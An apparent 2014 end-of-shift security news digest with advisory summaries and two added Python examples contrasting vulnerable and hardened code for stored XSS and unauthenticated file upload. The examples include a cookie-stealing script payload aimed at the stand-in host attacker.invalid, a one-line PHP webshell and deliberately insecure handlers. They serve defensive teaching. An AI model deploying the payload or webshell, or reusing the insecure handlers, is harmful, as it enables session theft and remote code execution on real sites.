End-of-Shift report
Timeframe: Monday 30-06-2014 18:00 − Tuesday 01-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
Microsoft Darkens 4MM Sites in Malware Fight
Millions of Web sites were shuttered Monday morning after Microsoft executed a legal sneak attack against a malware network thought to be responsible for more than 7.4 million infections of Windows PCs worldwide.
http://krebsonsecurity.com/2014/07/microsoft-darkens-4mm-sites-in-malware-fight/
Apple Releases Security Updates for OS X, Safari, iOS devices, and Apple TV
Apple has released security updates for Mac OS X, Safari, iOS devices, and Apple TV to address multiple vulnerabilities, some of which could allow attackers to execute arbitrary code with system privileges or cause an unexpected application termination.
https://www.us-cert.gov/ncas/current-activity/2014/07/01/Apple-Releases-Security-Updates-OS-X-Safari-iOS-devices-and-Apple
[2014-06-30] Multiple vulnerabilities in IBM Algorithmics RICOS
By abusing multiple vulnerabilities in IBM Algorithmics RICOS, an attacker can take over other users' accounts and bypass authorization mechanisms.
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140630-0_IBM_Algorithmics_RICOS_multiple_vulnerabilities_v10.txt
JBoss Seam org.jboss.seam.web.AuthenticationFilter code execution
http://xforce.iss.net/xforce/xfdb/94090
ICS Focused Malware
http://ics-cert.us-cert.gov//advisories/ICSA-14-178-01
CERT-Bund: Trojan victims change their passwords, PCs stay infected
An analysis of tens of thousands of compromised e-mail credentials shows that a considerable share of the victims do change their password but quickly fall victim again - possibly because the computer was never disinfected.
http://www.heise.de/security/meldung/CERT-Bund-Trojaner-Opfer-aendern-Passwoerter-PCs-bleiben-infiziert-2243405.html
[2014-07-01] Stored cross site scripting in EMC Documentum eRoom
Due to improper input validation, EMC Documentum eRoom suffers from multiple stored cross-site scripting vulnerabilities, which allow an attacker to steal other users' sessions, to impersonate other users and to gain unauthorized access to documents hosted in eRooms.
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140701-0_EMC_Documentum_eRoom_Stored_XSS_v10.txt
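The eRoom advisory names the bug class but not the code path. As an added illustration that is not part of this report or of SEC Consult's advisory, and uses no eRoom code, the following Python shows the same defect in a toy comment store: the vulnerable renderer interpolates stored input straight into HTML, the hardened one encodes it for the HTML text context. The Room class, the payload and the host name attacker.invalid are constructed for the example.

```python
import html
from dataclasses import dataclass, field


@dataclass
class Room:
    """Toy stand-in for a collaborative document room (constructed for this example)."""
    comments: list = field(default_factory=list)

    def post_comment(self, author: str, body: str) -> None:
        # Stored exactly as submitted: the store itself does no validation.
        self.comments.append((author, body))


def render_vulnerable(room: Room) -> str:
    """Interpolates stored values directly into HTML: a stored XSS sink."""
    rows = "".join(f"<li><b>{author}</b>: {body}</li>" for author, body in room.comments)
    return f"<ul>{rows}</ul>"


def render_hardened(room: Room) -> str:
    """Encodes every stored value for the HTML text context before interpolation."""
    rows = "".join(
        f"<li><b>{html.escape(author, quote=True)}</b>: {html.escape(body, quote=True)}</li>"
        for author, body in room.comments
    )
    return f"<ul>{rows}</ul>"


# Constructed payload: what a stored XSS attacker would post so that every later
# visitor's browser sends its cookies (the session) to a host the attacker controls.
PAYLOAD = '<script>new Image().src="https://attacker.invalid/c?"+document.cookie</script>'


def contains_live_script(rendered_html: str) -> bool:
    """Crude check used by the demo: does the page still carry a <script> element?"""
    return "<script>" in rendered_html.lower()


def demo() -> dict:
    """Posts a benign comment and the payload, renders both ways, reports the outcome."""
    room = Room()
    room.post_comment("alice", "Draft v2 is in the folder.")
    room.post_comment("mallory", PAYLOAD)
    return {
        "vulnerable": contains_live_script(render_vulnerable(room)),
        "hardened": contains_live_script(render_hardened(room)),
        "hardened_html": render_hardened(room),
    }


if __name__ == "__main__":
    print(demo())
```

Output encoding at the sink is the control that matters; the "improper input validation" wording of the advisory describes the symptom, and validation alone is not enough because one stored value may later be emitted in several contexts. Marking the session cookie HttpOnly would additionally keep document.cookie out of reach of this particular payload, though it does not stop a script from acting within the victim's session.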
Apple tests two-factor authentication on iCloud.com
In future, credentials on Apple's cloud portal are to be better protected as well. Yesterday the feature was briefly enabled.
http://www.heise.de/security/meldung/Apple-testet-Zwei-Faktor-Authentifizierung-auf-iCloud-com-2243841.html
Confusion over Microsoft's security newsletter
Anyone who administers Windows machines appreciates Microsoft's Security Notifications newsletter. Last week the company announced it was discontinuing it - only to reverse the decision shortly afterwards.
http://www.heise.de/security/meldung/Verwirrung-um-Microsofts-Sicherheits-Newsletter-2243456.html
Cyberspying Campaign Comes With Sabotage Option
New research from Symantec puts US and Western European energy interests in the bull's-eye, but the campaign could encompass more than just utilities.
http://www.darkreading.com/vulnerabilitiesthreats/advanced-threats/cyberspying-campaign-comes-with-sabotage-option/d/d-id/1278990
Geodo: New Cridex Version Combines Data Stealer and Email Worm
Recent efforts by our Research Lab have revealed new activity related to Cridex. As you may recall, Cridex is a data stealer also referred to as Feodo and Bugat. The new Cridex version we are seeing now, aka Geodo, combines a self-spreading infection method - effectively turning each bot in the botnet ..
http://www.seculert.com/blog/2014/07/geodo-new-cridex-version-combines-data-stealer-and-email-worm.html
Remote File Upload Vulnerability in WordPress MailPoet Plugin (wysija-newsletters)
Marc-Alexandre Montpas, from our research team, found a serious security vulnerability in the MailPoet WordPress plugin. This bug allows an attacker to upload any file remotely to the vulnerable website (i.e., no authentication is required). This is a serious vulnerability. The MailPoet plugin (wysija-newsletters) ..
http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html
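The Sucuri write-up's key point is that the upload path could be reached without any authentication. As an added example that is not part of this report, of Sucuri's analysis or of the MailPoet plugin's code, this Python contrasts a handler with that defect against a hardened one. The User and Upload classes, the capability flag and the sample uploads are constructed for the example.

```python
import os
import secrets
import tempfile
from dataclasses import dataclass
from typing import Optional


@dataclass
class User:
    """Hypothetical user record; can_manage_plugin stands in for a capability check."""
    name: str
    can_manage_plugin: bool


@dataclass
class Upload:
    """Hypothetical multipart upload: the client-supplied name and the raw bytes."""
    filename: str
    content: bytes


# Allow-list of accepted types with the magic bytes each must start with.
# Server-side script extensions are simply absent from the list.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


class UploadRejected(Exception):
    pass


def save_upload_vulnerable(upload: Upload, upload_dir: str) -> str:
    """The bug class: no authentication, no type check, attacker-chosen file name."""
    path = os.path.join(upload_dir, upload.filename)
    with open(path, "wb") as f:
        f.write(upload.content)
    return path


def save_upload_hardened(user: Optional[User], upload: Upload, upload_dir: str) -> str:
    """Authenticate, authorize, verify the type against content, then rename."""
    if user is None:
        raise UploadRejected("authentication required")
    if not user.can_manage_plugin:
        raise UploadRejected("insufficient privilege")
    # basename() discards any directory component (../) in the client-supplied name.
    base = os.path.basename(upload.filename)
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        raise UploadRejected(f"type '{ext or '<none>'}' not allowed")
    if not upload.content.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match declared type")
    # Server-chosen random name: the client controls neither the name nor the suffix.
    path = os.path.join(upload_dir, f"{secrets.token_hex(16)}.{ext}")
    with open(path, "wb") as f:
        f.write(upload.content)
    return path


def demo() -> dict:
    """Runs both handlers against a constructed webshell upload and a minimal PNG."""
    upload_dir = tempfile.mkdtemp()
    shell = Upload("shell.php", b"<?php system($_GET['c']); ?>")
    image = Upload("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    admin = User("admin", can_manage_plugin=True)
    results = {}
    # Vulnerable handler: the anonymous attacker's .php lands on disk under its own name.
    saved = save_upload_vulnerable(shell, upload_dir)
    results["vulnerable_shell_saved"] = os.path.basename(saved) == "shell.php"
    cases = [
        ("anon_shell", None, shell),
        ("admin_shell", admin, shell),
        ("admin_php_as_png", admin, Upload("x.png", shell.content)),
        ("admin_png", admin, image),
    ]
    for label, user, up in cases:
        try:
            saved = save_upload_hardened(user, up, upload_dir)
            results[label] = "saved:" + os.path.basename(saved).rsplit(".", 1)[-1]
        except UploadRejected as e:
            results[label] = "rejected:" + str(e)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The hardened version fails closed on four independent checks: a session, a capability, a type allow-list verified against the file's magic bytes rather than its name, and a server-chosen file name so that neither path components nor a .php suffix from the client reach the disk. In a WordPress plugin the first two map to is_user_logged_in() and current_user_can(); the destination directory should additionally be one from which the web server does not execute scripts.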
IBM BladeCenter Advanced Management Module (AMM), Integrated Management Module (IMM), and Integrated Management Module 2 (IMM2) Potential IPMI credentials Exposure
http://xforce.iss.net/xforce/xfdb/90880